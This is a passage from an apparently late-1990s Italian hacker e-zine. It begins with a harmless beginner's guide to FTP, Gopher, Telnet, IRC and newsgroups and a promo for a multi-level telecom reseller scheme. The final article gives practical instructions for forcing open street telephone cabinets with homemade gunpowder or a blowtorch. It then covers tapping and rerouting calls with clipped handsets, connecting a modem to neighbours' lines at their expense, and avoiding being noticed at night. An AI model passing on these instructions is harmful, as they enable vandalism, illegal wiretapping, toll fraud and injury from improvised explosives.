ipertestuali, fate click sul collegamento al file che vi interessa per
eseguirne il download, esistono poi altre possibilit… per utilizzare ftp che,
essendo pi— complicate sono oggi in disuso.

Personalmente, preferisco utilizzare un vero e proprio client ftp perchŠ, a
volte, i collegamenti ftp stabiliti con un browser Web creano qualche
problema, inoltre, generalmente, i browser non permettono di compiere tutte le
operazioni che svolge un programma ftp come ad esempio l'operazione di upload.

La comprensione del funzionamento dei programmi ftp ad interfaccia grafica,
non crea nessuna difficolt… infatti, essi hanno il pregio di essere molto
intuitivi, Š sufficiente uno sguardo per capire come si usano, ed Š proprio
per questo motivo che ne consiglio l'utilizzo.

Ecco i nomi dei client ftp pi— diffusi:

CuteFTP
WS_FTP

Per quanto riguarda i siti ftp, bisogna sapere che ne esistono di due tipi:

1. Siti ftp privati
2. Siti ftp pubblici

Per poter accedere ai siti ftp privati, Š necessario possedere una login e
una password che sono assegnate dal gestore del sito, mentre quando si accede
ad un sito ftp pubblico in genere, si fornisce come login la parola anonymous,
(in questo caso si parla di ftp anonimo), e come password il proprio indirizzo
e-mail generalmente il tutto Š fornito in maniera automatica dal proprio
client.

Una volta aperta la sessione il sito ftp si presenta come un albero di
directory, generalmente nella directory principale si trova un file di testo
con la descrizione del contenuto delle altre inoltre, gli stessi nomi delle
directory (ormai Š una convenzione), ne suggeriscono il contenuto.

Ogni volta che si esegue un download, Š opportuno fare una scansione del file
per verificare che non sia infetto da qualche virus, a questo scopo Š
consigliato un antivirus che esegue la scansione automatica del file al
termine di ogni download, questo vi evita di doverla avviare manualmente e
soprattutto di doverlo ricordare ogni volta.

Se l'antivirus vi dovesse segnalare che il file scaricato Š infetto
NON FATEVI PRENDERE DAL PANICO, le leggende sui virus sono molte ma, in
realt…, esiste solo un modo con cui un virus proveniente dalla Rete pu•
entrare nel vostro computer e cioŠ, siete voi che dovete mandare in esecuzione
in modo diretto (.COM, .EXE) o in modo indiretto (Macro di word o file batch),
un file infetto.

Archie e Gopher

Prima di iniziare a descrivere il funzionamento di queste due risorse
Internet, vorrei precisare che personalmente non le ho mai utilizzate perchŠ,
a mio avviso, sono obsolete in confronto ad altre, per quello che mi riguarda,
non mi Š mai capitato di non riuscire a soddisfare le mie esigenze attraverso
gli altri strumenti disponibili, quindi pur conoscendo il funzionamento di
tali risorse non ho mai avuto la necessit… di usarle.

Archie ovvero Archive

Archie Š un sistema di database che contatta periodicamente i server FTP
sparsi per il mondo e ne cataloga il contenuto, in genere questo database
viene interrogato dagli utenti che cercano un determinato file, ma non sanno
in quale sito FTP si trovi.

Anche Archie come ftp permette di effettuare i collegamenti in diversi modi i
pi— comuni sono: via Web o tramite client Archie, esistono poi altre tre
possibilit…, ma sono quanto meno scomode e, per questo, mi limiter• a parlare
di quelle appena citate.

Con il proprio browser Š possibile usare un server Archie via Web,
(se non sapete dove trovarlo fate una ricerca con un qualsiasi Net Motor),
una volta contattato tale server riempite opportunamente l'apposita casella e
avviate la ricerca.

Nella pagina Web visualizzata, probabilmente troverete alcune funzioni
supplementari che per la maggior parte sono intuitive ma, Š utile commentare
brevemente i tipi di ricerca che sono disponibili.

Una ricerca si pu• effettuare in modi diversi a seconda dell'opzione
selezionata, generalmente Š passibile basare la ricerca:

1.esattamente sul testo digitato
2.su una espressione Unix
3.sulla base del testo digitato, con possibilit… di trovare file che
semplicemente lo contengono e, non consentendo la sensibilit… alle maiuscole
(Default)
4.sulla base del testo digitato, con possibilit… di trovare file che
semplicemente lo contengono ma, consentendo la sensibilit… alle maiuscole,
scegliete quella che pi— si adatta e buona fortuna.

Per quanto riguarda i client Archie, non resta che recuperarne uno e provare,
tutta la teoria necessaria Š stata sopra esposta il resto Š solo pratica.

A mio avviso, Archie Š stato ampiamente rimpiazzato da siti quali ad esempio:

www.download.com
e tanti altri.

Gopher

Gopher Š l'immediato predecessore del WWW e rappresentava una grande risorsa
prima della fine del 1994 periodo in cui la comparsa del primo Browser
favorisce lo sviluppo del WWW che segner… in seguito il declino di Gopher.

Gopher presenta una serie di men— testuali che una volta selezionati possono
portare ad altri men—, alla copia di un file o altro ed Š l'evoluzione della
precedente interfaccia a riga di comando.

Oggi si usa tramite Web, ed esistono programmi per effettuare le ricerche su
server Gopher, ma ormai questo sistema Š dimenticato da tutti e del resto Š
pi— che comprensibile.

Cos'Š Telnet?

Telnet Š un programma che consente al nostro PC di diventare un terminale di
un elaboratore remoto, tutto ci• che noi faremo una volta aperta la sessione
Telnet, sar… elaborato dal computer remoto e non dal nostro PC e, proprio per
questo motivo, sono previsti diversi livelli di utenza ognuno dei quali
consente o meno l'accesso a determinati file.

Per accedere a Telnet usate Telnet.exe di Windows 95, se non siete abilitati
per una sessione telnet dal vostro provider, cercate un sistema in cui
l'accesso sia consentito a tutti, (usate i Net Motor), se dopo la connessione
il testo non viene visualizzato in modo chiaro, cambiate l'emulazione del
terminale, in genere VT-100 (Default) funziona correttamente.

La comunicazione in Internet, analisi delle varie possibilit….

Internet, mette a disposizione dell'utente molte possibilit… per conversare
in rete, e di questo tutti abbiamo sentito parlare ma, oltre agli esami di
laurea in diretta, quali sono le reali possibilit…?

Innanzitutto per meglio comprendere l'argomento si rende necessaria una prima
macro distinzione tra la comunicazione in tempo reale e non.

La comunicazione in tempo reale

Esistono molti strumenti che permettono questo tipo di comunicazione.
Possiamo distinguere in due diversi gruppi a seconda del protocollo su cui Š
basato il loro funzionamento ovvero:

1. IRC
2. Chat su base Talk

L' IRC (Internet Relay Chat)

Si basa sul protocollo omonimo, per avviare una sessione irc Š necessario:

1. Un programma client IRC
2. Contattare un server IRC
3. Scegliere un canale di discussione

Generalmente l'interfaccia di un client IRC mostra sulla destra i logname
degli utenti collegati mentre in basso si ha la casella in cui digitare il
messaggio, se selezionate un utente, si aprirŠ un'ulteriore finestra,
identica a quella appena descritta ma, il messaggio che invierete sar…
rivolto esclusivamente a quella persona.

Se invece scrivete un messaggio nella finestra principale, questo verr…
replicato dal server a tutti gli utenti presenti sul canale.

Tramite le Chat IRC c'Š anche la possibilit… di spedire file, usare macro.

La configurazione el 'utilizzo del client IRC di norma non comporta nessun
problema particolare, in quanto tutte le funzioni sono accessibili tramite
men— a tendina.

Infine rimane da dire che nei canali IRC Š presente un moderatore, che si
occupa di controllare il comportamento degli utenti e che la discussione
rimanga in tema escludendo eventuali indesiderati.

Le Chat su base Talk

Il talk e un protocollo originariamente ideato per permettere a due persone
di comunicare in tempo reale tra di loro, negli ultimi tempi per• ha trovato
applicazione in diversi client che permettono la discussione tra pi— persone
contemporaneamente, mantenendo per• le sue caratteristiche principali.

Per poter dialogare con un qualsiasi client che basa il suo funzionamento sul
protocollo talk, Š necessario seguire la procedura sotto riportata:

1. Richiedere all'utente con cui si desidera parlare di stabilire il
collegamento tramite un indirizzo
2. Se l'utente desiderato ha in esecuzione lo stesso client per Chat talk
(condizione necessaria), gli verr… richiesto se vuole accettare o meno la
proposta di collegamento
3. Se l'utente desiderato accetta viene stabilita la connessione, altrimenti
compare un messaggio del tipo: l'utente X non vuole rispondere

L'interfaccia di un client talk, Š totalmente diversa da quella di un client
IRC ed inoltre e variabile a seconda del programma usato.

In genere comunque, tutti i programmi basati su talk, permettono il
trasferimento di file, la conversazione vocale, l'utilizzo di macro, di una
lavagna condivisa e ovviamente la classica conversazione testuale.

Inoltre questi programmi, similmente agli IRC, visualizzano su richiesta
dell'utente la lista delle persone collegate e prevedono anche la possibilit…
di effettuare ricerche praticamente con qualsiasi chiave.

Si noti che i programmi che supportano il video, funzionano sulla base di
questo protocollo, ovviamente, Š necessaria una telecamera come ad esempio la
famosa Quik Cam (nata per Mac).

I software pi— conosciuti per le comunicazioni in tempo reale sono:

mIRC
PowWow
ICQ
Net Meeting
I-Phone (supporto video)
CUSEEME (supporto video)

La comunicazione non in tempo reale

I canali di comunicazione non in tempo reale sono quattro, e precisamente:

1. E-Mail
2. WWW Chat
3. Mailing list
4. Newsgroup (UseNet)

E-Mail

 noto che l'e-mail (electronic mail) Š molto pi— veloce rispetto alla
tradizionale snail-mail (posta lumaca), perchŠ inpiega pochi secondi per
arrivare a destinazione ma, nonostante ci•, Š concettualmente considerata un
mezzo di comunicazione non in tempo reale infatti, sebbene abbiamo una vaga
idea del tempo che intercorre tra l'invio e l'arrivo di una mail, non possiamo
sapere quando il destinatario la legger….

Grazie ad un qualsiasi Browser, gli utenti di Internet sono in grado di
gestire tutte le possibilit… che il protocollo SMTP offre.

Tra queste sono di particolare importanza le seguenti:

Attachments specifica una lista di file acclusi al messaggio
Cc (Carbon Copy) specifica una serie di indirizzi e-mail ai quali deve essere mandata una copia del messaggio
La possibilit… di specificare il livello di priorità del messaggio
La possibilit… di filtrare i messaggi

WWW Chat

Basate sul protocollo Http, le WWW Chat si suddividono in:

1. Web Chat
2. Java Chat

Web Chat

Un Web Chat Š un sistema che permette il dialogo tra due o pi— utenti tramite
una pagina WWW, l'utente in questo tipo di chat, (una volta constatata la
presenza di altre persone per mezzo dell'apposita lista), non deve far altro
che scrivere il messaggio e premere l'apposito tasto che provoca il
ricaricamento della pagina in rete con la frase appena digitata, questa
operazione a lungo termine Š estenuante, per quanto semplice non ne vale
proprio la pena.

Java Chat

Java Š un linguaggio di programmazione sviluppato dalla Sun, ed Š orientato
alla rete, il suo pregio principale Š quello di poter essere eseguito su
qualsiasi piattaforma.
Le Java Chat hanno un'interfaccia simile a quella dei client IRC, per poter
sfruttare questo tipo di chat Š necessario avere un browser in grado di
eseguire gli applet java (programmi inseriti in pagine WWW).

Questo tipo di Chat Š pi— veloce della precedente.

Le mailing list

Una mailing list Š basata sul protocollo SMTP, in pratica Š una lista di
indirizzi e-mail appartenenti a persone che hanno un interesse comune, e
vogliono scambiarsi mail sull'argomento.
Per partecipare ad una mailing list Š necessario spedire una mail ad uno
specifico indirizzo.

Chiunque voglia dire o chiedere qualcosa sull'argomento non deve far altro che
inoltrare una mail all'indirizzo convenzionale, il listserver provveder… a
spedire il messaggio a tutti gli indirizzi degli appartenenti alla lista.

Esistono mailing list praticamente su tutti gli argomenti, dai Simpson
all'Euro, in alcune liste Š presente un moderatore quindi, cercate di
rispettare la netiquette per evitare spiacevoli inconvenienti.

Prima di aderire ad una mailing list considerate il fatto che potreste
trovare centinaia di lettere nella vostra casella di posta e quindi, correte
il rischio di "
forare" i Mb a vostra disposizione.

L'iscrizione Š revocabile in qualsiasi momento.

I newsgroup (UseNet)

Basati sul protocollo News, i gruppi di discussione sono simili ad una mailing
list ma, presentano tre fondamentali differenze e cioŠ:

1. Non hanno l'obbligo di iscrizione (iscriversi serve solo per fare in modo
che il programma visualizzi solo i newsgroup ai quali si Š interessati)
2. Non Š necessaria una casella di posta in quanto ci sono appositi server che
conservano i messaggi (a tempo determinato)
3. Ai newsgroup si accede tramite browser (si scaricano i messaggi dal server)

I newsgroup devono essere letti con apposito client (in genere ogni browser
ne contiene uno), uno tra i pi— conosciuti Š Free Agent.
Anche i newsgroup possono essere moderati e non, nel primo caso i messaggi
vengono inoltrati via e-mail ad un moderatore che decide se approvarli o meno,
comunque sia evitate gli off-topic (messaggi fuori argomento).

I newsgroup si dividono in binari e non, nella prima ipotesi potete inviare
insieme oltre che il vostro messaggio anche file allegati, nel secondo caso
invece non potete farlo, ovviamente in quest'ultima ipotesi la velocit… delle
varie operazioni Š maggiore.

Ci sono diverse categorie di newsgroup quali ad esempio:

comp (informatica e argomenti connessi)
news (reti e software relativo alle news)
rec (Hoby tempo libero e arti)
sci (ricerche ed applicazioni scientifiche)
soc (aspetti sociali, rilevanti politicamente o sociologicamente in generale)
talk (Dibattiti su tutti gli argomenti)
misc (tutto ci• che non rientra nelle altre)

altri...

L'insieme dei newsgroup Š detto Usenet per distinguerlo da Internet, in
effetti questa distinzione non Š del tutto fuori luogo infatti, i messaggi
dei nowsgroup vengono trasmessi anche su altre reti di calcolatori diverse da
internet.

Altri servizi "
interessanti"...

Nel descrivere questi servizi far• riferimento ad un famoso software per
Win95/98 ovvero CyberKit quindi se volete provare non dovete fare altro che
procurarvelo.

Descrizione dei servizi resi disponibili da CyberKit:

Ping

Verifica la raggiungibilit… di un sito e l'efficienza del collegamento che si
pu• stabilire con esso.

TraceRoute

Individua il percorso compiuto dai pacchetti di dati per giungere dal computer
dell'utente ad un computer remoto.

Finger

Fornisce varie informazioni relative all'utente fingerato (l'utente deve
essere collegato), se l'utente non viene specificato viene presentata una
lista di tutti gli utenti attualmente collegati all'host.

WhoIs

Programma che ricerca informazioni su un determinato utente, o sottodominio
della rete, interrogando un determinato database.

Name Server Lookup (NS LookUp)

Programma che effettua ricerche all'interno del database del DNS, con questo
tipo di programma si possono ritrovare gli IP numerici corrispondenti ad un
nome letterale, e viceversa.

Quote Of The Day (QoD)

Tradotto letteralmente sta per, citazione del giorno, nulla di essenziale ma,
pu• essere divertente.

provate ad utilizzare questi servizi e comincerete a rendervi conto di quanto
siano potenti e a quali risvolti possono portare :).

Per concludere, tengo a precisare che, CyberKit Š solo uno dei tanti software
dedicati che si possono trovare, Ping, Finger e TraceRoute, possono essere
lanciati anche da prompt inoltre si tenga presente che i servizi
"
interessanti" non sono solo quelli sopra citati.


Siamo cos giunti FINALMENTE alla fine di questa mini guida, cosa?, vi siete
rotti a leggerla? bhe pensate a quanto mi sono SKAZZATO a scriverla, con la
promessa che non scriver• mai pi— una guida per novizi vi saluto...

Un ringraziamento a tutto il Newbie Staff in particolare N0bodY88 per avermi
coinvolto...
[DarkSide]
PS=Ringrazio moltissimo x questa guida che fa' comprendere a CHIUNQUE le basi
per poter ' capire come e' fatto internet , spero vivamente che tu voglia
scrivere altri articoli come questo x noi e spero che altri articoli belli
come questo seguiranno [ ho visto molte crew unirsi e poi distruggersi per
i motivi piu' futili ... ma questo non e' proprio il nostro caso ] ...
Grazie di tutto cuore ZeroCool

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³LE NOVITA' PER QUANTO RIGUARDA MAMMA TELECOM E ALTRE ...³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

I&T Dream Project

Ovvero un progetto da sogno Una compagnia italiana senza legami con telecom o
altri che parte con un capitale sociale di 10 miliardi [ ovviamente al livello
azionario ] facente capo all' editore Virgilio Degiovanni , con forte struttura
centrale a Milano , dove gia' opera il suo staff di 200 persone in oltre 2000
metri quadrati di sede centrale , a cui si aggiungono i 300 addetti al call-center,
per l' assistenza alla rete Advisor e ai clienti . La forza del progetto sta
indubbiamente nei servizi di telecomunicazione e nel sistema di distribuzione
dei profitti . Ok Approfondiamo l' argomento con un po' di dati un poco sgamo:

i punti dell'I&T:

distribuire tutti i servizi
guadagnare su 8 livelli della propria squadra attivando solo 20 contratti Infostrada e 2 Modile Office
guadagnare l' extra profitto
formare la prima linea della propria squadra guadagnando sui contratti da questa procurata

ed ora le cose bellissime:

Ogni Advisor puo' richiedere :

Internet ad training Service [ lire 300000 + iva che e' un sito a nome del richiedente di spazio 400mb ]

Il piano di attacco di questa societa' e' basato quindi sulla creazione di una
rete indipendente da mamma Telecazz offrendo servizi basati quindi per la telefonia
fissa da Infostrada e per la mobile da carte prepagate NAT GrAnDi[nd Zc] i presupposti
su cui si basano sono:

1 Ogni utente ha il desiderio di risparmiare
2 Siamo in grado di fornire servizi di alta qualita' per Internet realizzati da Infostrada e NAT
3 Con una vasta rete di distributori extra motivativati da un sistema di guadagno
esclusivo si pensa di conquistare una fetta del mercato italiano nel giro di 6 mesi
equivalente al 29% .

Quota raggiunta attualmente per il 20% ottimo......

Presto tutte le info e i numeri per diventare ADVISOR ok.......

Ps accludo immagini relative all' espansione di questa societa' nel file immagini.zip
By ZeroCool [ oh finalmente lo ho finito sto cazz di articolo ]...

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

!!!!!!!!!!!!!!!!!!!!!!!!!!\TELEKOM E CENTRALINE/!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! QuEsTo aRtIcOlO è StAtO ScRiTtO Da CyRuS ThE ViRuS e Dr.ShAdE!!!!!!
!!!! deLla IHC, CheM-Boy DOVE TI TROVAVI IN QUESTO MOMENTO!! !!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!\TELEKOM E CENTRALINE/!!!!!!!!!!!!!!!!!!!!!!!

DISCLAIMER: Queste informazioni sono da intendersi solo a scopo informativo e
didattico, non siamo quindi responsabili delle conseguenze che
potrebbero verificarsi in seguito all' errato utilizzo di tale articolo.


PREMESSA:

In questo articolo non verrà citata la localita in cui noi della
IHC abbiamo operato, si ricorda che fare tutto ci• alla vista di
occhi indiscreti, Š una cazzata. Quindi okki in mano mentre provate a fare queste cose!
L' articolo e stato steso da Dr.ShAdE e Cyrus The Virus membri della IHC (ItALiAn HaCkEr CrEw). Special FRIEND "
ChEm-BoY"
######### # #
# ## ##
# ###### # ###### ###### ###### # # # #
# # # # # # # # # #
# ### # ### # # # # #
# # # # # # # # #
# ###### ##### ###### ###### ###### # #


Bene adesso che mi sono divertito male a fare i disegnini
passiamo alla sresura del nostro articolo...


<---TELEKOM E CENTRALINE--->

Autori: CyRuS ThE ViRuS e DoCtOr ShAdE (IHC)

Consumo: 13 ESTA THE GUSTO LIMONE
2 PEZZI DI PIZZA
3 PACHETTI DI GOMME.... {MARCA SCONOSCIUTA}

Musica ascoltata: Musica PROGRESSIV MOLTO TRUZZA
Con FRANCHINO, DuplŠ, GABRI
FASANO, LEO DE GAS, ZICHY IL GIULLARE.
RICHY LE. ROY (RIMANI SEMPRE UN MITO)
P.S
Questo articolo viene scritto dopo circa tre giorni dagli esperimenti sulle
centraline, naturalmente, per•, durante l' hackeraggio, il consumo alimentare Š
stato maggiore :-)


Bene.

Prima di tutto, vogliamo precisare che , non tutte le città
hanno le stesse centraline, o meglio, non tutti i comuni
hanno un tipo solo di centraline , come quelle su cui
abbiamo lavorato noi. Comunque vedrete meglio sulle foto
che abbiamo scattato.
Il materiale che abbiamo usato era coposta da
Un computer portatile , modem PCMCIA ,
una torcia elettrica {per hacking notturni}
un tester per il voltaggio, un cavo elettrico e un cavo telefonico di circa
3/4 metri, che ci Š servito per fare i fili di connessione.
E poi la valigetta del bravo PHREAKER
con saldatore e altre stronzate.
Tutto il lavoro svolto, Š stato suddiviso in due giorni:

1) PRIMO GIORNO
Bhe, all' inizio non credevamo che l' esperimento andasse avanti
anche un secondo giorno, ma gli eventi accaduti ci fecero cambiare idea.
Nel nostro pimo giorno, la mattina, abbiamo
fatto un giro, per osservare tutti i tipi di centraline telekom
possibili.
Abbiamo osservto le centraline ai bordi delle strade,
quelle vicino ai palazzi, quelle che si collegano alle case
e quelle che controllano il traffico di piu di 300 telefoni.
Mentre giravamo sui potenti mezzi messi a disposizione dall' IHC, ci accorgemmo
di una centralina veramente ecceccionale: alta circa un metro e mezzo, larga mezzo e veramente imponente.
Con la plachetta con su scritto *TELECOM ITALIA*.
Ora... non si sa se vi siete ma fermati a lungo a guardare una centralina
telekom...
Quelle che abbiamo esaminato noi erano di due tipi...
o meglio tre, ma il terzo sara poi descritto a lungo nel secondo
giorno.
Il primo tipo Š quello che si trova ai lati delle case,abbastanza piccole, che
controllano non + di 13 linee...
Il secondo Š quello che si trova vicino alle cabine telefoniche e, naturalmente,
regge solo quelle..
Il terzo tipo, quello che abbiamo hackato noi, Š quello che si trova di solito nel
centro delle piazze principali delle città... Si distingue dalle altre per la sua
grandezza e per le pareti esterne in metallo e non in plastica...

Per cominciare vi diciamo subito che la serratura non Š molto semplice
da aprire... Ci sono due metodi:
Primo)
Bisogna avere la chiave passpartou telekom che un volta girata
fa aprire un sistema a combinazione che, combinato con una manopola
del tipo a ghiera, fa aprire il meccanismo.
(domanda... ma se avete la chiave (cosa impossibile ai comuni mortali), che cazzo
andate a cercare di forzare una centralina, visto che siete impiegati telecom....!?!?!

Secondo)
O con la polvere da sparo, come abbiamo fatto noi, o con una fiamma
ossidrica (reperibile dalla propria mesticheria di fiducia).
<--POLVERE DA SPARO-->
Carbone/zolfo/salnitro.
Una volta preparato l' impasto,si avvolge in un cartone , si attacca accanto alla serratura con
il nsatro adesivo, ci si mette una miccia, e BOOM!!!
Oppure si pu• anche fare un innesto utilizzando la batteria 12 Volts
del motorino...
Non importa che faccia il botto, basta la fiammata,
in quanto si scioglie la palstica, formando un buco. Fatto questo,si
inserisce un caccaivite e si forza con cura: SI APRE!!!!

<--FIAMMA-->
Pi— semplice e pi— veloce: vi procurate una fiamma ossidrica
in mesticheria dal costo che varia dalle trenta alle quaranta carte
e fate il vostro buchetto da dove inserire il cacciavite.

Una volta aperta , appare una visione quasi idilliaca di mille
intrecci di fili di mamma Telkom: una belezza!
Ripresi dalla emozione, si procede con gli esperimenti.
Ci raccomandiamo: non bisogna agire impulsivamente sulla prima centralina
che ci si para davanti,noi per esempio, abbiamo esegiuto il tutto in 3 , 4 giorni di sopraluoghi
costanti.
La domanda che ci si pone ora,Š questa: "
che cosa si pu• fare con tale bellezza?"
Bhe vi assicuriamo che ci si pu• fare di tutto... noi abbiamo
fatto solo alcuni esperimeti dei tanti realizzabili.
A noi ci interssava principalmente verificare la possibilità
di fare deviazioni di chiamta, connessioni anche di rimbalzo, e prove con i cordless.

1) Intercettazione telefonica e deviazione della chiamata.

Per cominciare vi diciamo che non Š difficle, ma bisogna agire con la
massima cura e delicatezza.
Infatti, dentro una centralina, ci passa la corrente, quindi, tagliare il
cavo sbagliato, potrebbe costarvi, non diciamo le penne, ma come minimo
una bella scottatura...
Per tale esperimento vi serve un normalissimo telefono di casa.
Noi ne abbiamo acquistato uno al Supermercato. Poi, una volta tagliata la parte terminate {la presa},
la si deve sostuire con dei morsetti a coccodrillo {piccoli}...
Adesso abbiamo uno strumento molto interssante: un semplice
telefono, che risolve molti problemi.
Per prima cosa vogliamo dire che bisogna stare calmi, non si devono mettere
la mani, a caso.... ma si deve prima fare un paio di prove
con il tester elettronico... Si controlla tensione e amperaggio...
--Vedendo una delle nostre foto allegate, vi farete una chiara impressione di
ci• di cui stiamo parlando...---
Ora collocando i morsetti sulla parte terminate del filo telkom (o sulla saldatura stessa)
si entra , in mezzo alla linea, ci• vuol dire che Š possibile
ascolatare e intervenire nella telfonata,
oppure si puo chiamare un nostro parente sperduto in Ruanda-Burundi...
...Tanto non spendiamo noi!!!---
Facciamo adesso un passo avanti....
Se noi prendiamo un pezzo di cavo telefonico {con morsetti}
lo possimao usare per fare ponte,possiamo cioŠ, deviare una chiamata e dirigerla verso un altro telfono.
P.S Non vi dico che risate a invertire TUTTE le chiamte in entrata con quelle
in usciata... :-)
Insomma, noi ci siamo divertiti ma, tralasciando il piacere, torniamo ai nostri esperimenti...
Una cosa molto importante, Š il fatto che si pu• ridirigere le chiamate.

---Vi consigliamo di agire: Di notte, in un giorno di festa, e magari
sarebbe meglio avere il padre AVVOCATO.---
Comunque se non ci si fa prendere dal panico... non si corrono troppi
rischi. Altro consiglio é magari quello di svolgere
un paio di prove, prima di agire, per vedere se
in caso di grane , Š possibile scappare velocemente.
Inoltre. Quando cercate di aprire la centralina, mi raccomando
di non lasciare casino: meno si vede, pi— possibilita avrete
di ritornarci in un

  
secondo momento.
Comunque ci• che abbiamo capito il primo giorno della missione
Š questo:
1 Le centraline si possono aprire senza troppi problemi.
2 La linea telefonica Š presente... quindi basta attaccarci il modem..
3 E' possibile costruire dei ponticelli.
4 Si possono deviare le chiamate.


Nel secondo giorno spiegheremo una delle cose
pi— interessati. Una volta acquistata sicurezza sulle tecniche
sopra citate e possibile fare altre cose pi— complicate.

2)!!!!!!!!!!!!!!!!!!!!!SECONDO GIORNO!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Siamo adesso giunti al secondo giorno dei nostri esperimenti.
Bhe questa parte e un po' piu' difficile da seguire. Anche perchŠ
noi abbiamo agito a intuito e senza mai avere nulla di certo,
ma siamo andati avanti ipotizzando teorie, che poi
sono risultate pienamente realizzazbili.

Premessa: Il materiale del secondo giorno

Computer Portatile, modem PCMCIA, il nostro solito telefono,
telefono cellulare, torcia elettrica, cavi telefonici,
tester, morsetti, e altri piccoli oggetti da phreaker.

Per prima cosa, cio' che abbiamo fatto lo potevamo benissimo fare
dalla nonstra prima centralina hackata {1 giorno, anzi magari era meglio};
ma quella cha abbiamo utilizzato, era tutta di un-altro tipo
{vedere foto 2} piccola e con pochi intrecci.
Una volta aperta nello stesso modo della prima, unica
differenza che questa serratura era molto piu piccola,
l' abbiamo attentamente osservata: collegava un unica abitazione;
ma potevamo benissimo attaccarci ad una delle altre 12 linee presenti....
Noi abbiamo proceduto TESTANDO con il tester il voltaggio
di una linea probabilmente quella della abitazione... non succedeva
nulla: restava tutto molto costante; dopo circa 15 minuti
il tester impazisce ma si riporta subito costante,
probabilmente, hanno ricevuto una telefonata, oppure hanno
loro telefonato.
A quel punto avevamo una linea sulla quale agire...
A casa avevamo prima di tutto creato un semplice cavo
che ci serviva per interagire.
Un normale cavo telfonico che, da una parte si attaccava al modem PcMcia,
dall' altra parte ai morsetti; in mezzo al cavo
avevamo collegato il nostro telefono....
Ma a cosa ci Š servito il telefono collegato al computer
e alla centralina?
Semplice, per verificare una coretta connesione, e in secondo
luogo per avere sempre il telefono a portata di mano.
Una volta avviato il computer
abbiamo subito provato la connessione con successo!!!!!
Quindi ci eravamo collegati a spese di altri, e in secondo luogo
potevamo far rimbalzare la nostra connessione su di un altra casa
in modo da tenere le linee telfoniche sempre libere.
Ma la cosa pi— divertente era quella di utilizzare direttamente
una linea telekom {Linea di servizio}...
Si riconosceva facilmente perche li si collegavano tutte le altre
linee.
Si capisce bene che i vantaggi sono molti perchŠ Š quindi possibile
fare un ponte di linee, tornarsene a casa
e sfrttare il ponte per la connessione... magari avendo anche utilizzato la base di un
cordless interrata.
Ma basti pensare che , se invece esserci collegati a questo tipo
di centralina ci eravamo collegati, a quella grossa del primo
giorno? bhe io penso che sarebbe stato veramete molto pi— seria la
cosa: perchŠ bastava far ponte sulla mia linea di casa, e
collegarmi da casa, ma utilizzare la linea di una abitazione
due isolati piu lontana.
Ma il difficile sarebbe individuare la propria linea...{se vedete la prima
foto vi rendete conto}.
Un modo, potrebbe essere quello di telefonare ad una segreteria
telefonica, tornare alla centralina e con il telefono cercare
la telefonata che avevamo effetuato.
Insomma le cose che si possono fare sono veramente tante
noi ne abbiamo eseguite alcune con sucesso ,
poi sta anche a voi, utilizzare la fantasia , per
trovare nuove tecniche.
A proposito del materiale: MA il CELLULARE A COSA CI E SERVITO?
Bhe nulla di ci• che pensate, ma e utile per non destare sopetti
nei confronti della gente che passeggia di notte e che potrebbe
insospetrisi se vede dei ragazzi che alle 3 o alle 4 di notte
smanettano su roba telkom.
Allora noi, appena vedevamo una macchina che passava, chiudevamno il computer nella sacca,
e, con il cellulare facevamo finta di parlare...
Pu• sembrare paranoico, ma vi assicuriamo che funziona!!!
Attenti alle persone che vi guadano: non volgete mai la faccia
dalla loro parte. E cercate di essere naturali il pi— possibile
---Ehh Ehh facile essere naturali in queste situazioni---

Ci raccomandiamo di non fare cazzate con le info raccolte in questo articolo...
Per maggiori informazioni sulle centraline telecom, potete scriverci a ithackcrew@iname.com
oppure per vedere tutte le altre foto, potrete consultare il nostro sito a:
http://members.tripod.com/~ithackcrew/index.html

...

DR.SHADE E CYRUS THE VIRUS BY I.H.C (ITALIAN HACKER CREW)
Un ringraziamento, particolare al nostro
AMICO "ChEm-BoY" che non Š potuto venire al meeting
CAusE.... \/[OpS]\/

NOTA DI N0bodY88 = a nome del NewBies Staaff ringrazio Dr.Shade, Cyrus The Virus,
ChEm-BoY, e tutta l'Italian Hacker Crew. Le foto che sono state
citate si trovano sul ns sito www.newbies.tsx.org nel file
foto_ihc.zip tra i file downoadabili.

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

